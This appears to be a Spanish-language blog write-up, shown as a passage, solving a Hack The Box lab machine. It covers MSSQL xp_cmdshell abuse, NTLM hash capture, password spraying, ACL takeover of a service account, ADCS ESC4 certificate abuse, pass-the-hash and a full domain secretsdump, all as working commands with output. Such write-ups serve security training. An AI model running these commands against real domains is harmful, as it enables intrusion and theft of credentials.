[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> select user_name();
      
---   
dbo   

SQL (sa  dbo@master)>

Shell Commands

Activamos xp_cmdshell para ejecutar comandos en la maquina, vemos que tenemos acceso como svc_sql, ademas obtuvimos el hash de este, pero, no fue posible crackearlo con el wordlist rockyou.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
# EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
# EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

SQL (sa  dbo@master)> xp_cmdshell "whoami"
ERROR(DC01\SQLEXPRESS): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL (sa  dbo@master)> EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> xp_cmdshell "whoami"
output           
--------------   
sequel\sql_svc   

NULL             

SQL (sa  dbo@master)> xp_cmdshell "dir \\10.10.14.75\d"
output              
-----------------   
Access is denied.   

NULL                

SQL (sa  dbo@master)>
1
2
3
4
5
[+] Listening for events...

[SMB] NTLMv2-SSP Client   : 10.10.11.51
[SMB] NTLMv2-SSP Username : SEQUEL\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::SEQUEL:4bc6c3eae87a4b2f:6D3308806F1F8564561B06DE5B78F521:010100000000000080BA8B15946CDB01F3908B6207595C7900000000020008003300530053004B0001001E00570049004E002D0056004E003400550041004C005400570037005600510004003400570049004E002D0056004E003400550041004C00540057003700560051002E003300530053004B002E004C004F00430041004C00030014003300530053004B002E004C004F00430041004C00050014003300530053004B002E004C004F00430041004C000700080080BA8B15946CDB0106000400020000000800300030000000000000000000000000300000E4D92F16933857FCC88C4AF4252CED5BF23FFDA62536EF16FD1F817F049103330A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00370035000000000000000000

Tras enumerar los directorios encontramos un archivo de configuracion en sql2019\ donde observamos una contrasena.

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
SQL (sa  dbo@master)> xp_cmdshell "dir c:\sql2019\expressadv_enu"
output                                                            
---------------------------------------------------------------   
 Volume in drive C has no label.                                  

 Volume Serial Number is 3705-289D                                

NULL                                                              

 Directory of c:\sql2019\expressadv_enu                           

NULL                                                              

01/03/2025  07:29 AM    <DIR>          .                          

01/03/2025  07:29 AM    <DIR>          ..                         

06/08/2024  02:07 PM    <DIR>          1033_ENU_LP                

09/24/2019  09:03 PM                45 AUTORUN.INF                

09/24/2019  09:03 PM               788 MEDIAINFO.XML              

06/08/2024  02:07 PM                16 PackageId.dat              

06/08/2024  02:07 PM    <DIR>          redist                     

06/08/2024  02:07 PM    <DIR>          resources                  

09/24/2019  09:03 PM           142,944 SETUP.EXE                  

09/24/2019  09:03 PM               486 SETUP.EXE.CONFIG           

06/08/2024  02:07 PM               717 sql-Configuration.INI      

09/24/2019  09:03 PM           249,448 SQLSETUPBOOTSTRAPPER.DLL   

06/08/2024  02:07 PM    <DIR>          x64                        

               7 File(s)        394,444 bytes                     

               6 Dir(s)   3,787,042,816 bytes free                

NULL                                                              

SQL (sa  dbo@master)> xp_cmdshell "type c:\sql2019\expressadv_enu\sql-Configuration.INI"
output                                              
-------------------------------------------------   
[OPTIONS]                                           

ACTION="Install"                                    

QUIET="True"                                        

FEATURES=SQL                                        

INSTANCENAME="SQLEXPRESS"                           

INSTANCEID="SQLEXPRESS"                             

RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"   

AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"        

AGTSVCSTARTUPTYPE="Manual"                          

COMMFABRICPORT="0"                                  

COMMFABRICNETWORKLEVEL=""0"                         

COMMFABRICENCRYPTION="0"                            

MATRIXCMBRICKCOMMPORT="0"                           

SQLSVCSTARTUPTYPE="Automatic"                       

FILESTREAMLEVEL="0"                                 

ENABLERANU="False"                                  

SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"         

SQLSVCACCOUNT="SEQUEL\sql_svc"                      

SQLSVCPASSWORD="WqSZAF6CysDQbGb3"                   

SQLSYSADMINACCOUNTS="SEQUEL\Administrator"          

SECURITYMODE="SQL"                                  

SAPWD="MSSQLP@ssw0rd!"                              

ADDCURRENTUSERASSQLADMIN="False"                    

TCPENABLED="1"                                      

NPENABLED="1"                                       

BROWSERSVCSTARTUPTYPE="Automatic"                   

IAcceptSQLServerLicenseTerms=True                   

NULL                                                

SQL (sa  dbo@master)>

Realizamos password spraying con el wordlist que ya tenemos y vemos que ryan tiene acceso a traves de winrm con esta contrasena.

1
2
3
❯ crackmapexec winrm sequel.htb -u allusers.txt -p "WqSZAF6CysDQbGb3" 2>/dev/null | grep +
WINRM                    sequel.htb      5985   DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)

User - Ryan

Utilizamos las credenciales con evil-winrm logrando acceder a la maquina y obtener nuestra flag user.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ evil-winrm -i sequel.htb -u ryan -p "WqSZAF6CysDQbGb3"
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
sequel\ryan
*Evil-WinRM* PS C:\Users\ryan\Documents> cd ../Desktop
d*Evil-WinRM* PS C:\Users\ryan\Desktop> dir


    Directory: C:\Users\ryan\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        1/22/2025   2:13 AM             34 user.txt


*Evil-WinRM* PS C:\Users\ryan\Desktop> cat user.txt
085ec93c410c7a5d7c3949f84d1b1f7b
*Evil-WinRM* PS C:\Users\ryan\Desktop>

User - ca_svc

Anteriormente encontramos al usuario ca_svc este usuario es miembro del grupo “Cert Publishers”, se observa en su nombre “Certification Authority” lo que indicaria que puede leer y emitir certificados, y posiblemente tener privilegios de administrador.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
*Evil-WinRM* PS C:\Users\ryan\Documents> net user ca_svc
User name                    ca_svc
Full Name                    Certification Authority
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            1/22/2025 9:07:29 PM
Password expires             Never
Password changeable          1/23/2025 9:07:29 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   1/22/2025 3:55:09 PM

Logon hours allowed          All

Local Group Memberships      *Cert Publishers
Global Group memberships     *Domain Users
The command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents>

BloodHound & Analysis

Ejecutamos bloodhound para obtener informacion de usuarios y grupos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
❯ bloodhound-python -u ryan -p "WqSZAF6CysDQbGb3" -ns 10.10.11.51 -d sequel.htb -c all --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: sequel.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.sequel.htb:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.sequel.htb
INFO: Found 10 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.sequel.htb
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.51:445)] timed out
WARNING: DCE/RPC connection failed: [Errno Connection error (10.10.11.51:445)] timed out
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 00M 21S
INFO: Compressing output into 20250123000702_bloodhound.zip

Tras subir el archivo zip, confirmamos que ca_svc pertenece al grupo Cert Publishers.

image

Con la opcion de “Shortest Paths to Here from Owned” se muestra que Ryan tiene permiso “WriteOwner” sobre ca_svc, lo que permitiria modificar a este usuario.

image

Ownership & FullControll

Ejecutamos owneredit y dacledit, lo que nos permitiria obtener control sobre el usuario ca_svc. Tras la ejecucion se muestra que fue exitosa.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
❯ impacket-owneredit -action write -new-owner 'ryan' -target-dn 'CN=Certification Authority,CN=Users,DC=sequel,DC=htb' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-548670397-972687484-3496335370-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=sequel,DC=htb
[*] OwnerSid modified successfully!
❯ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'ryan' -target-dn 'CN=Certification Authority,CN=Users,DC=sequel,DC=htb' 'sequel.htb'/'ryan':'WqSZAF6CysDQbGb3' -dc-ip 10.10.11.51 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250123-013613.bak
[*] DACL modified successfully!

Change Password

Con el control sobre este ejecutamos un cambio de contrasena utilizando net. Realizamos el cambio , crackmapexec muestra que son credenciales validas.

1
2
3
4
5
❯ net rpc password ca_svc 'Password@987' -U 'sequel.htb'/'ryan%WqSZAF6CysDQbGb3' -S 10.10.11.51
❯ crackmapexec smb sequel.htb -u ca_svc -p "Password@987"
SMB         sequel.htb      445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         sequel.htb      445    DC01             [+] sequel.htb\ca_svc:Password@987 

Privesc

Ahora que tenemos acceso a ca_svc, ejecutamos certipy-ad para buscar plantillas de certificados vulnerables. Encontramos que DunderMifflinAuthentication es vulnerable a ESC4.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
❯ certipy-ad find -vulnerable -u ca_svc@sequel.htb -p Password@987 -stdout
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[!] Failed to resolve: DC01.sequel.htb
[*] Trying to get CA configuration for 'sequel-DC01-CA' via CSRA
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via CSRA: [Errno -2] Name or service not known
[*] Trying to get CA configuration for 'sequel-DC01-CA' via RRP
[!] Got error while trying to get CA configuration for 'sequel-DC01-CA' via RRP: [Errno Connection error (DC01.sequel.htb:445)] [Errno -2] Name or service not known
[!] Failed to get CA configuration for 'sequel-DC01-CA'
[!] Failed to resolve: DC01.sequel.htb
[!] Got error while trying to check for web enrollment: [Errno -2] Name or service not known
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : sequel-DC01-CA
    DNS Name                            : DC01.sequel.htb
    Certificate Subject                 : CN=sequel-DC01-CA, DC=sequel, DC=htb
    Certificate Serial Number           : 152DBD2D8E9C079742C0F3BFF2A211D3
    Certificate Validity Start          : 2024-06-08 16:50:40+00:00
    Certificate Validity End            : 2124-06-08 17:00:40+00:00
    Web Enrollment                      : Disabled
    User Specified SAN                  : Unknown
    Request Disposition                 : Unknown
    Enforce Encryption for Requests     : Unknown
Certificate Templates
  0
    Template Name                       : DunderMifflinAuthentication
    Display Name                        : Dunder Mifflin Authentication
    Certificate Authorities             : sequel-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectRequireCommonName
                                          SubjectAltRequireDns
    Enrollment Flag                     : AutoEnrollment
                                          PublishToDs
    Private Key Flag                    : 16842752
    Extended Key Usage                  : Client Authentication
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : SEQUEL.HTB\Enterprise Admins
        Full Control Principals         : SEQUEL.HTB\Cert Publishers
        Write Owner Principals          : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Dacl Principals           : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
        Write Property Principals       : SEQUEL.HTB\Domain Admins
                                          SEQUEL.HTB\Enterprise Admins
                                          SEQUEL.HTB\Administrator
                                          SEQUEL.HTB\Cert Publishers
    [!] Vulnerabilities
      ESC4                              : 'SEQUEL.HTB\\Cert Publishers' has dangerous permissions

Certipy - ESC4

Ejecutamos la explotacion de ESC. Sobreescribimos la configuracion de la plantilla con certipy-ad.

1
2
3
4
5
6
7
❯ certipy-ad template -u ca_svc@sequel.htb -p Password@987 -template DunderMifflinAuthentication -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'DunderMifflinAuthentication' to 'DunderMifflinAuthentication.json'
[*] Updating certificate template 'DunderMifflinAuthentication'
[*] Successfully updated 'DunderMifflinAuthentication'

Con la plantilla vulnerable, solicitamos un certificado especificando el upn de administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
❯ certipy-ad req -u ca_svc@sequel.htb -p Password@987 -ca sequel-DC01-CA -target 10.10.11.51 -template DunderMifflinAuthentication -upn administrator@sequel.htb -dns sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 43
[*] Got certificate with multiple identifications
    UPN: 'administrator@sequel.htb'
    DNS Host Name: 'sequel.htb'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_sequel.pfx'

Realizamos la autenticacion con el certificado logrando obtener el hash de administrator.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
❯ certipy-ad auth -pfx administrator_sequel.pfx -dc-ip 10.10.11.51
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
    [0] UPN: 'administrator@sequel.htb'
    [1] DNS Host Name: 'sequel.htb'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff

Shell

Con el hash de administrator logramos obtener acceso por medio de winrm y realizar la lectura de nuestra flag root.txt.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
❯ evil-winrm -i sequel.htb -u administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
sequel\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
dir*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        1/22/2025   5:27 AM             34 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
6b8217cea4bffa69115f65c55e5551a4
*Evil-WinRM* PS C:\Users\Administrator\Desktop>

Dump Hashes

Realizamos un dump de las hashes con impacket-secretdumps.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
❯ impacket-secretsdump administrator@sequel.htb -hashes :7a8d4e04986afa8ed4060f75e5a0b3ff
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x07057881f4c9d60499fd59bba9ae4929
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
SEQUEL\DC01$:aes256-cts-hmac-sha1-96:cb5c43b6d92bb097d345a545f324f9caa4d6ef91c2f0267ecfc7ed76546a9df3
SEQUEL\DC01$:aes128-cts-hmac-sha1-96:eef978409ad7a2a86eef37f48de21850
SEQUEL\DC01$:des-cbc-md5:a892b025a1684ad9
SEQUEL\DC01$:plain_password_hex:799d42a4c9050c328e8bbdb7b93568b68c2b048291ccac285099a2029e7b37203a70ee818c14657a0048716ce61598e844de25b002668bf9b304071dbe5b681f8afb6b981f7ace9727b8dc45c4463f3be8ccbe7e8fd2948d677dc03ed85e5f6e903834c1c228969f7030294347ec4c57f6319edabb47b0efb564aba7f5f195e9a6815bb27fd69a4cf235d4df93f2c34a79978ade6e068c7e7e46eb1129a9e67dff6dfea58a354e6627309facd710b354fb66dcea17c845604bae941ce39fc49a3af7dc3d14bdc16d7f9c56ce9ef6243144c7ee18cf4664e5003a6c86073811a7866e70b130134934b09abd09a7964390
SEQUEL\DC01$:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::
[*] DefaultPassword 
SEQUEL\Administrator:n3KuDVzUicepJ0Bm
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x38bfbe5761658576a78af7d4c26e7a8a1422848a
dpapi_userkey:0x3adfe88507630dfd1f8a91a579d015f2427d1016
[*] NL$KM 
 0000   D4 CD C5 D0 C1 CB 45 04  6C EA 54 2E 91 E1 C3 2D   ......E.l.T....-
 0010   88 26 C2 04 00 30 F1 16  71 C1 DE A5 19 96 71 E2   .&...0..q.....q.
 0020   BB C7 38 D7 A4 25 6E 36  F0 2C 68 85 38 3E FD B1   ..8..%n6.,h.8>..
 0030   7E 3C 11 DC 3A 56 41 DC  6A 8F 32 D3 A3 F4 D8 5F   ~<..:VA.j.2...._
NL$KM:d4cdc5d0c1cb45046cea542e91e1c32d8826c2040030f11671c1dea5199671e2bbc738d7a4256e36f02c6885383efdb17e3c11dc3a5641dc6a8f32d3a3f4d85f
[*] _SC_MSSQL$SQLEXPRESS 
SEQUEL\sql_svc:WqSZAF6CysDQbGb3
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1acb6bdf708cb2e0b6802e77649e55cc:::
sequel.htb\michael:1103:aad3b435b51404eeaad3b435b51404ee:cafe5ec3c162eaf0d46e3013b0d71dba:::
sequel.htb\ryan:1114:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\oscar:1116:aad3b435b51404eeaad3b435b51404ee:97504ea3a7ca31b7d91e26ef82e3e383:::
sequel.htb\sql_svc:1122:aad3b435b51404eeaad3b435b51404ee:b9b72edb319dce49b5da313e71491133:::
sequel.htb\rose:1601:aad3b435b51404eeaad3b435b51404ee:0e0b8e0b06c681da8c3f1f17e53a4a56:::
sequel.htb\ca_svc:1607:aad3b435b51404eeaad3b435b51404ee:3b181b914e7a9d5508ea1e20bc2b7fce:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:66ad063789d27b459aeaf39372dc628a:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:968abd11086022e97f88b30a22b0053b8ea85ba3ec7219073b2348412befd4a7
Administrator:aes128-cts-hmac-sha1-96:89e80e336f0e4e6cfc86bd492c6cad83
Administrator:des-cbc-md5:b0a4ad1a98311334
krbtgt:aes256-cts-hmac-sha1-96:fb9766744ab94559541847d2984c9831c815992e1070309a5cbc88c76b56f0cd
krbtgt:aes128-cts-hmac-sha1-96:f365950f1fe180450832470e1695d44c
krbtgt:des-cbc-md5:5db9c2fd578a1cd3
sequel.htb\michael:aes256-cts-hmac-sha1-96:e93493d0476db7d001d5f3b2ae25595b602bedc7108eaced0044748f6413a860
sequel.htb\michael:aes128-cts-hmac-sha1-96:8b8a6f85d95763c9c3fd721e8e33a270
sequel.htb\michael:des-cbc-md5:86bc0b2c3b5b5eec
sequel.htb\ryan:aes256-cts-hmac-sha1-96:676bd0149bfc8f193967991eaec21fc0af77c2364c360f363507e3d647bca2a8
sequel.htb\ryan:aes128-cts-hmac-sha1-96:4fff4b149f767c81378c977d14c5070c
sequel.htb\ryan:des-cbc-md5:1929372c084fdcd0
sequel.htb\oscar:aes256-cts-hmac-sha1-96:d0497357f3dfcbdcd80878db9ea6829f556b5eb25b3f8cbbe0416ae0223577bf
sequel.htb\oscar:aes128-cts-hmac-sha1-96:f4856b529096b1dbf3a6037ae501ce23
sequel.htb\oscar:des-cbc-md5:102f08dfb3d0c71f
sequel.htb\sql_svc:aes256-cts-hmac-sha1-96:3e9f4068aa26eebec597f04014f93846c5bd9d5b47a6acc89f16dafda3d620db
sequel.htb\sql_svc:aes128-cts-hmac-sha1-96:c3cd53730282eea99772bceb78cdf485
sequel.htb\sql_svc:des-cbc-md5:9b1357d3aea186b6
sequel.htb\rose:aes256-cts-hmac-sha1-96:f904a8eccae44567647e727118655b0e83ba8055c873dc3060c8b2d6fbcc4660
sequel.htb\rose:aes128-cts-hmac-sha1-96:efe028112c8b1662dea3a876c3fae28a
sequel.htb\rose:des-cbc-md5:0d9b13cbf88aa44f
sequel.htb\ca_svc:aes256-cts-hmac-sha1-96:d820f67f11df4ac5d4e22e9aafb7c8f2c07ea7491f06b8569d712a6eb9cf8cea
sequel.htb\ca_svc:aes128-cts-hmac-sha1-96:42d45fb86f8b69ba9b66bc195412aa15
sequel.htb\ca_svc:des-cbc-md5:405b7f263723626b
DC01$:aes256-cts-hmac-sha1-96:cb5c43b6d92bb097d345a545f324f9caa4d6ef91c2f0267ecfc7ed76546a9df3
DC01$:aes128-cts-hmac-sha1-96:eef978409ad7a2a86eef37f48de21850
DC01$:des-cbc-md5:c7b908f27919a854
[*] Cleaning up... 
Share on

Dany Sucuc
WRITTEN BY
sckull
RedTeamer & Pentester wannabe